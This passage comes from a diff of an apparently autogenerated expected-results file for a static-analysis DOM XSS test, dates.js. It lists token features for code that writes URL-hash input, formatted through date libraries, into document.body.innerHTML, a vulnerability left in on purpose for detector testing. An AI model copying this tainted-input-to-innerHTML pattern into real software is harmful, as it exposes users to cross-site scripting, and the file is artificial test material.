innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:27 | documen ... nerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:65 | documen ... mat()}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:65 | documen ... mat()}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:65 | documen ... mat()}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:65 | documen ... mat()}` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:65 | documen ... mat()}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:14:17:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:14:17:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:17:14:17:17 | body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:14:17:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:14:17:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:19:17:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:19:17:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:17:19:17:27 | innerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:19:17:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:19:17:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:17:31:17:65 | `Time i ... mat()}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:17:31:17:65 | `Time i ... mat()}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:17:31:17:65 | `Time i ... mat()}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:17:31:17:65 | `Time i ... mat()}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:17:31:17:65 | `Time i ... mat()}` | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:17:31:17:65 | `Time i ... mat()}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:32:17:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:32:17:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:17:32:17:39 | Time is | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:32:17:39 | Time is | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:32:17:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:32:17:39 | Time is | stringConcatenatedWith | -endpoint- moment().format() | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:47 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:47 | moment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:47 | moment | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:47 | moment | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:47 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:54 | exceptional return of moment(taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:54 | exceptional return of moment(taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:54 | exceptional return of moment(taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:54 | exceptional return of moment(taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:54 | exceptional return of moment(taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:54 | moment(taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:54 | moment(taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:54 | moment(taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:54 | moment(taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:54 | moment(taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:61 | moment(taint).format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:61 | moment(taint).format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:61 | moment(taint).format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:61 | moment(taint).format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:61 | moment(taint).format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:63 | exceptional return of moment( ... ormat() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:63 | exceptional return of moment( ... ormat() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:63 | exceptional return of moment( ... ormat() | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:63 | exceptional return of moment( ... ormat() | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:63 | exceptional return of moment( ... ormat() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:63 | moment( ... ormat() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:63 | moment( ... ormat() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:63 | moment( ... ormat() | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:63 | moment( ... ormat() | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:63 | moment( ... ormat() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:42:17:63 | moment( ... ormat() | stringConcatenatedWith | 'Time is ' -endpoint- | | autogenerated/Xss/DomBasedXss/dates.js:17:49:17:53 | taint | CalleeFlexibleAccessPath | moment | | autogenerated/Xss/DomBasedXss/dates.js:17:49:17:53 | taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:17:49:17:53 | taint | calleeImports | moment | @@ -12998,12 +97132,69 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:17:49:17:53 | taint | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:17:49:17:53 | taint | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:17:49:17:53 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:56:17:61 | format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:56:17:61 | format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:17:56:17:61 | format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:56:17:61 | format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:56:17:61 | format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:12 | document | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:17 | document.body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:27 | documen ... nerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:66 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:66 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:66 | documen ... aint)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:66 | documen ... aint)}` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:18:5:18:66 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:18:14:18:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:18:14:18:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:18:14:18:17 | body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:18:14:18:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:18:14:18:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:18:19:18:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:18:19:18:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:18:19:18:27 | innerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:18:19:18:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:18:19:18:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:18:31:18:66 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:18:31:18:66 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:18:31:18:66 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:18:31:18:66 | `Time i ... aint)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:18:31:18:66 | `Time i ... aint)}` | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:18:31:18:66 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:18:32:18:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:18:32:18:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:18:32:18:39 | Time is | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:18:32:18:39 | Time is | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:18:32:18:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:18:32:18:39 | Time is | stringConcatenatedWith | -endpoint- dateformat() | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:51 | dateformat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:51 | dateformat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:51 | dateformat | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:51 | dateformat | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:51 | dateformat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:64 | datefor ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:64 | datefor ... taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:64 | datefor ... taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:64 | datefor ... taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:64 | datefor ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:64 | datefor ... taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:64 | exceptional return of datefor ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:64 | exceptional return of datefor ... taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:64 | exceptional return of datefor ... taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:64 | exceptional return of datefor ... taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:18:42:18:64 | exceptional return of datefor ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:18:53:18:56 | time | CalleeFlexibleAccessPath | dateformat | | autogenerated/Xss/DomBasedXss/dates.js:18:53:18:56 | time | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:18:53:18:56 | time | calleeImports | dateformat | @@ -13020,12 +97211,100 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:18:59:18:63 | taint | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:18:59:18:63 | taint | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:18:59:18:63 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:20:5:20:30 | import ... dayjs'; | contextFunctionInterfaces | 